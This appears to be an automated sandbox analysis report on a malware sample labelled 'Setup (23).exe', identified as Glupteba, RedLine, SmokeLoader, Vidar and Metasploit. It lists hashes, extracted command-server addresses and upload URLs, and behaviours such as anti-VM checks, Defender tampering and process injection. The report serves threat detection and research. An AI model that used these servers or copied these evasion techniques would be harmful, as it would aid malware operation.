glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (23).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score

10^/10

glupteba metasploit redline smokeloader vidar 28.08 937 backdoor discovery dropper evasion infostealer loader stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

28.08

95.181.172.100:15089

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

https://eduarroma.tumblr.com/

Attributes

profile_id
937

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral32/memory/6060-568-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral32/memory/6060-536-0x0000000000451610-mapping.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9576 7040 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9576	7040	rundll32.exe

RedLine Payload 44 IoCs

Processes:

resource	yara_rule
behavioral32/memory/4916-273-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5060-303-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/4916-270-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral32/memory/5076-304-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/2828-307-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5076-328-0x00000000052D0000-0x00000000058D6000-memory.dmp	family_redline
behavioral32/memory/4484-338-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/2828-352-0x0000000005730000-0x0000000005C2E000-memory.dmp	family_redline
behavioral32/memory/4228-357-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/4876-360-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/4116-399-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/1160-410-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/4376-422-0x0000000005770000-0x0000000005D76000-memory.dmp	family_redline
behavioral32/memory/4228-415-0x00000000058C0000-0x0000000005EC6000-memory.dmp	family_redline
behavioral32/memory/2816-443-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/4116-442-0x0000000005570000-0x0000000005B76000-memory.dmp	family_redline
behavioral32/memory/2884-452-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/1160-465-0x00000000052E0000-0x00000000057DE000-memory.dmp	family_redline
behavioral32/memory/2816-486-0x0000000005710000-0x0000000005C0E000-memory.dmp	family_redline
behavioral32/memory/5664-516-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5328-530-0x0000000005340000-0x0000000005946000-memory.dmp	family_redline
behavioral32/memory/5752-574-0x0000000004F30000-0x0000000005536000-memory.dmp	family_redline
behavioral32/memory/5136-584-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/3228-591-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/6012-559-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5932-550-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/5808-534-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/5752-528-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/5816-508-0x000000000041C5F6-mapping.dmp	family_redline
behavioral32/memory/5480-493-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/5436-488-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/5328-479-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/5140-460-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/5184-464-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5164-462-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/4160-400-0x000000000041C5BE-mapping.dmp	family_redline
behavioral32/memory/4484-387-0x00000000054B0000-0x0000000005AB6000-memory.dmp	family_redline
behavioral32/memory/4956-373-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/4376-371-0x000000000041C5E6-mapping.dmp	family_redline
behavioral32/memory/4656-341-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/5060-333-0x00000000058E0000-0x0000000005EE6000-memory.dmp	family_redline
behavioral32/memory/4168-325-0x000000000041A6B2-mapping.dmp	family_redline
behavioral32/memory/5712-622-0x000000000041C6AA-mapping.dmp	family_redline
behavioral32/memory/2968-611-0x000000000041A6B2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral32/memory/1108-491-0x00000000020B0000-0x000000000214D000-memory.dmp	family_vidar
behavioral32/memory/1108-514-0x0000000000400000-0x0000000001DCC000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

yJ0w_PFws52zIA5lf0zuOaT_.exeC26RJLqvVeUnUeOcGiaiXZcf.exeMKhCIDEDBR_9XiO3j6GLjfon.exeBlKCMNz7NjwRGtvSQRxnNy_V.exe8zu5BlCvH6XbjUyBbrDQMMsR.exejtekxXy10dQo9GRFnjVgDBca.exeAtgfylhhxHNLjURwlJjyOtIM.exeiLzvlQbBihOlVLP7qToVz1b5.exe9cLqEsI0vXIaeEh3T6RksIH_.exe30KVL6nXUeMHDAbGiWz_82kI.exed5twSMRR4K0XE4E70WyeSSax.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeIDqaKyGy46PBAbQsG8fyhkNY.exewA1QzOOSwqJoESjFl9ItpcfI.exehNXNBKN1amDNvT0pTwA9Jd5K.exeZormC_xzlcw3eF39Dsw4gyRO.exeEt386eo4H7fyeQ96XtoQdW04.exeDoc8sn8FnxfF7ycbDLoMoE3c.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeGlcT3nCcuGvmoDEZK75Ke4M8.exejcTBuAwwQ9QMC84r7XxcLyXd.exe1AX2C4itmKm79vcHJb50pVbn.exepd4PGK1I_4ctZ8JzykfMFnnD.exetbm4hlMHnKIcx5LulO6PeSoe.exeoceR7XX7WaasPNlh7KK47XB6.exeKdYIL1HuczMjKv27pdPThPLi.exerQSCG7tdNk7dgwOqbhiio5qh.exeC26RJLqvVeUnUeOcGiaiXZcf.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeKdYIL1HuczMjKv27pdPThPLi.exeC26RJLqvVeUnUeOcGiaiXZcf.exeSJwV3vwJv4GlOYIPyRJmFl0a.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeKdYIL1HuczMjKv27pdPThPLi.exeSJwV3vwJv4GlOYIPyRJmFl0a.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeC26RJLqvVeUnUeOcGiaiXZcf.exeKdYIL1HuczMjKv27pdPThPLi.exeSJwV3vwJv4GlOYIPyRJmFl0a.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeKdYIL1HuczMjKv27pdPThPLi.exeC26RJLqvVeUnUeOcGiaiXZcf.exeSJwV3vwJv4GlOYIPyRJmFl0a.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeKdYIL1HuczMjKv27pdPThPLi.exeC26RJLqvVeUnUeOcGiaiXZcf.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeKdYIL1HuczMjKv27pdPThPLi.exeC26RJLqvVeUnUeOcGiaiXZcf.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeKdYIL1HuczMjKv27pdPThPLi.exeKdYIL1HuczMjKv27pdPThPLi.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeC26RJLqvVeUnUeOcGiaiXZcf.exe9cLqEsI0vXIaeEh3T6RksIH_.exeWerFault.exesIESWKwSGCFB5N6Xe4D_Gm0p.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeC26RJLqvVeUnUeOcGiaiXZcf.exeAtgfylhhxHNLjURwlJjyOtIM.exeKdYIL1HuczMjKv27pdPThPLi.exe

pid	process
3588	yJ0w_PFws52zIA5lf0zuOaT_.exe
3728	C26RJLqvVeUnUeOcGiaiXZcf.exe
2272	MKhCIDEDBR_9XiO3j6GLjfon.exe
2320	BlKCMNz7NjwRGtvSQRxnNy_V.exe
3716	8zu5BlCvH6XbjUyBbrDQMMsR.exe
3988	jtekxXy10dQo9GRFnjVgDBca.exe
3256	AtgfylhhxHNLjURwlJjyOtIM.exe
4036	iLzvlQbBihOlVLP7qToVz1b5.exe
3148	9cLqEsI0vXIaeEh3T6RksIH_.exe
4044	30KVL6nXUeMHDAbGiWz_82kI.exe
1672	d5twSMRR4K0XE4E70WyeSSax.exe
3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe
2604	IDqaKyGy46PBAbQsG8fyhkNY.exe
3840	wA1QzOOSwqJoESjFl9ItpcfI.exe
4028	hNXNBKN1amDNvT0pTwA9Jd5K.exe
1108	ZormC_xzlcw3eF39Dsw4gyRO.exe
684	Et386eo4H7fyeQ96XtoQdW04.exe
2816	Doc8sn8FnxfF7ycbDLoMoE3c.exe
2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
2368	GlcT3nCcuGvmoDEZK75Ke4M8.exe
4124	jcTBuAwwQ9QMC84r7XxcLyXd.exe
4136	1AX2C4itmKm79vcHJb50pVbn.exe
4212	pd4PGK1I_4ctZ8JzykfMFnnD.exe
4404	tbm4hlMHnKIcx5LulO6PeSoe.exe
4444	oceR7XX7WaasPNlh7KK47XB6.exe
4496	KdYIL1HuczMjKv27pdPThPLi.exe
4812	rQSCG7tdNk7dgwOqbhiio5qh.exe
4952	C26RJLqvVeUnUeOcGiaiXZcf.exe
4916	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4960	SJwV3vwJv4GlOYIPyRJmFl0a.exe
5088	KdYIL1HuczMjKv27pdPThPLi.exe
5060	C26RJLqvVeUnUeOcGiaiXZcf.exe
5076	SJwV3vwJv4GlOYIPyRJmFl0a.exe
2828	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4168	KdYIL1HuczMjKv27pdPThPLi.exe
4484	SJwV3vwJv4GlOYIPyRJmFl0a.exe
4656	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4228	C26RJLqvVeUnUeOcGiaiXZcf.exe
4876	KdYIL1HuczMjKv27pdPThPLi.exe
4376	SJwV3vwJv4GlOYIPyRJmFl0a.exe
4956	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4116	KdYIL1HuczMjKv27pdPThPLi.exe
4160	C26RJLqvVeUnUeOcGiaiXZcf.exe
424	SJwV3vwJv4GlOYIPyRJmFl0a.exe
1160	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4924	SJwV3vwJv4GlOYIPyRJmFl0a.exe
180	KdYIL1HuczMjKv27pdPThPLi.exe
5108	C26RJLqvVeUnUeOcGiaiXZcf.exe
2816	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
2884	KdYIL1HuczMjKv27pdPThPLi.exe
5140	C26RJLqvVeUnUeOcGiaiXZcf.exe
5164	SJwV3vwJv4GlOYIPyRJmFl0a.exe
5184	KdYIL1HuczMjKv27pdPThPLi.exe
5328	KdYIL1HuczMjKv27pdPThPLi.exe
5468	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
5436	SJwV3vwJv4GlOYIPyRJmFl0a.exe
5480	C26RJLqvVeUnUeOcGiaiXZcf.exe
5788	9cLqEsI0vXIaeEh3T6RksIH_.exe
5640	WerFault.exe
5664	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
5752	SJwV3vwJv4GlOYIPyRJmFl0a.exe
5808	C26RJLqvVeUnUeOcGiaiXZcf.exe
6060	AtgfylhhxHNLjURwlJjyOtIM.exe
5932	KdYIL1HuczMjKv27pdPThPLi.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

jtekxXy10dQo9GRFnjVgDBca.exeBlKCMNz7NjwRGtvSQRxnNy_V.exeIDqaKyGy46PBAbQsG8fyhkNY.exeEt386eo4H7fyeQ96XtoQdW04.exetbm4hlMHnKIcx5LulO6PeSoe.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jtekxXy10dQo9GRFnjVgDBca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jtekxXy10dQo9GRFnjVgDBca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BlKCMNz7NjwRGtvSQRxnNy_V.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IDqaKyGy46PBAbQsG8fyhkNY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IDqaKyGy46PBAbQsG8fyhkNY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Et386eo4H7fyeQ96XtoQdW04.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BlKCMNz7NjwRGtvSQRxnNy_V.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Et386eo4H7fyeQ96XtoQdW04.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tbm4hlMHnKIcx5LulO6PeSoe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tbm4hlMHnKIcx5LulO6PeSoe.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup (23).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup (23).exe

Themida packer 15 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\BlKCMNz7NjwRGtvSQRxnNy_V.exe	themida
C:\Users\Admin\Documents\jtekxXy10dQo9GRFnjVgDBca.exe	themida
C:\Users\Admin\Documents\BlKCMNz7NjwRGtvSQRxnNy_V.exe	themida
C:\Users\Admin\Documents\IDqaKyGy46PBAbQsG8fyhkNY.exe	themida
C:\Users\Admin\Documents\Et386eo4H7fyeQ96XtoQdW04.exe	themida
C:\Users\Admin\Documents\IDqaKyGy46PBAbQsG8fyhkNY.exe	themida
C:\Users\Admin\Documents\Et386eo4H7fyeQ96XtoQdW04.exe	themida
C:\Users\Admin\Documents\jtekxXy10dQo9GRFnjVgDBca.exe	themida
C:\Users\Admin\Documents\tbm4hlMHnKIcx5LulO6PeSoe.exe	themida
behavioral32/memory/3988-225-0x0000000000230000-0x0000000000231000-memory.dmp	themida
behavioral32/memory/2604-248-0x0000000001360000-0x0000000001361000-memory.dmp	themida
behavioral32/memory/4404-257-0x0000000001000000-0x0000000001001000-memory.dmp	themida
behavioral32/memory/684-242-0x0000000000ED0000-0x0000000000ED1000-memory.dmp	themida
behavioral32/memory/2320-232-0x00000000010B0000-0x00000000010B1000-memory.dmp	themida
C:\Users\Admin\Documents\tbm4hlMHnKIcx5LulO6PeSoe.exe	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Et386eo4H7fyeQ96XtoQdW04.exetbm4hlMHnKIcx5LulO6PeSoe.exejtekxXy10dQo9GRFnjVgDBca.exeBlKCMNz7NjwRGtvSQRxnNy_V.exeIDqaKyGy46PBAbQsG8fyhkNY.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Et386eo4H7fyeQ96XtoQdW04.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	tbm4hlMHnKIcx5LulO6PeSoe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jtekxXy10dQo9GRFnjVgDBca.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BlKCMNz7NjwRGtvSQRxnNy_V.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IDqaKyGy46PBAbQsG8fyhkNY.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ipinfo.io
30 ipinfo.io
124 ip-api.com
132 ipinfo.io
135 ipinfo.io

flow	ioc
29	ipinfo.io
30	ipinfo.io
124	ip-api.com
132	ipinfo.io
135	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

jtekxXy10dQo9GRFnjVgDBca.exeBlKCMNz7NjwRGtvSQRxnNy_V.exeIDqaKyGy46PBAbQsG8fyhkNY.exeEt386eo4H7fyeQ96XtoQdW04.exetbm4hlMHnKIcx5LulO6PeSoe.exe

pid	process
3988	jtekxXy10dQo9GRFnjVgDBca.exe
2320	BlKCMNz7NjwRGtvSQRxnNy_V.exe
2604	IDqaKyGy46PBAbQsG8fyhkNY.exe
684	Et386eo4H7fyeQ96XtoQdW04.exe
4404	tbm4hlMHnKIcx5LulO6PeSoe.exe

Suspicious use of SetThreadContext 31 IoCs

Processes:

sIESWKwSGCFB5N6Xe4D_Gm0p.exeC26RJLqvVeUnUeOcGiaiXZcf.exeSJwV3vwJv4GlOYIPyRJmFl0a.exeKdYIL1HuczMjKv27pdPThPLi.exe9cLqEsI0vXIaeEh3T6RksIH_.exewA1QzOOSwqJoESjFl9ItpcfI.exeAtgfylhhxHNLjURwlJjyOtIM.exe

description	pid	process	target process
PID 2188 set thread context of 4916	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 3728 set thread context of 5060	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 3984 set thread context of 5076	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 2188 set thread context of 2828	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 4496 set thread context of 4168	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 3984 set thread context of 4484	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 2188 set thread context of 4656	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 3728 set thread context of 4228	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 4496 set thread context of 4876	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 3984 set thread context of 4376	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 2188 set thread context of 4956	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 4496 set thread context of 4116	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 3728 set thread context of 4160	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 2188 set thread context of 1160	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 3728 set thread context of 5108	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 2188 set thread context of 2816	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 4496 set thread context of 2884	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 3728 set thread context of 5140	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 3984 set thread context of 5164	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 2188 set thread context of 5184	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 4496 set thread context of 5328	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 3984 set thread context of 5436	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 3728 set thread context of 5480	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 3148 set thread context of 5788	3148	9cLqEsI0vXIaeEh3T6RksIH_.exe	9cLqEsI0vXIaeEh3T6RksIH_.exe
PID 3840 set thread context of 5816	3840	wA1QzOOSwqJoESjFl9ItpcfI.exe	RegSvcs.exe
PID 2188 set thread context of 5664	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
PID 3984 set thread context of 5752	3984	SJwV3vwJv4GlOYIPyRJmFl0a.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
PID 3256 set thread context of 6060	3256	AtgfylhhxHNLjURwlJjyOtIM.exe	AtgfylhhxHNLjURwlJjyOtIM.exe
PID 3728 set thread context of 5808	3728	C26RJLqvVeUnUeOcGiaiXZcf.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
PID 4496 set thread context of 5932	4496	KdYIL1HuczMjKv27pdPThPLi.exe	KdYIL1HuczMjKv27pdPThPLi.exe
PID 2188 set thread context of 6012	2188	sIESWKwSGCFB5N6Xe4D_Gm0p.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe

Drops file in Program Files directory 7 IoCs

Processes:

oceR7XX7WaasPNlh7KK47XB6.exesIESWKwSGCFB5N6Xe4D_Gm0p.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	oceR7XX7WaasPNlh7KK47XB6.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	oceR7XX7WaasPNlh7KK47XB6.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	oceR7XX7WaasPNlh7KK47XB6.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	oceR7XX7WaasPNlh7KK47XB6.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	oceR7XX7WaasPNlh7KK47XB6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 43 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process
5492	5164	WerFault.exe
5796	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
5280	4124	WerFault.exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
5852	5480	WerFault.exe
5524	5184	WerFault.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
5384	5108	WerFault.exe
5640	4124	WerFault.exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
4640	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
3064	4124	WerFault.exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
6288	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
6680	4124	WerFault.exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
6784	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
6576	5352	WerFault.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
4868	4124	WerFault.exe	jcTBuAwwQ9QMC84r7XxcLyXd.exe
7620	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
7612	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
7976	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
7256	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
7524	4136	WerFault.exe	1AX2C4itmKm79vcHJb50pVbn.exe
7636	5944	WerFault.exe	KdYIL1HuczMjKv27pdPThPLi.exe
4184	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
6424	7988	WerFault.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
7284	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
7264	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
7616	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
9024	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
8768	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
8228	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
9512	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
9944	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
10080	9292	WerFault.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
8520	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
8820	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
9336	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
10116	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
9612	1108	WerFault.exe	ZormC_xzlcw3eF39Dsw4gyRO.exe
4568	11084	WerFault.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
13636	888	WerFault.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe
15176	14540	WerFault.exe	sIESWKwSGCFB5N6Xe4D_Gm0p.exe
15388	16012	WerFault.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
16248	15608	WerFault.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
1172	16244	WerFault.exe	C26RJLqvVeUnUeOcGiaiXZcf.exe
8256	14836	WerFault.exe	SJwV3vwJv4GlOYIPyRJmFl0a.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8zu5BlCvH6XbjUyBbrDQMMsR.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8zu5BlCvH6XbjUyBbrDQMMsR.exe
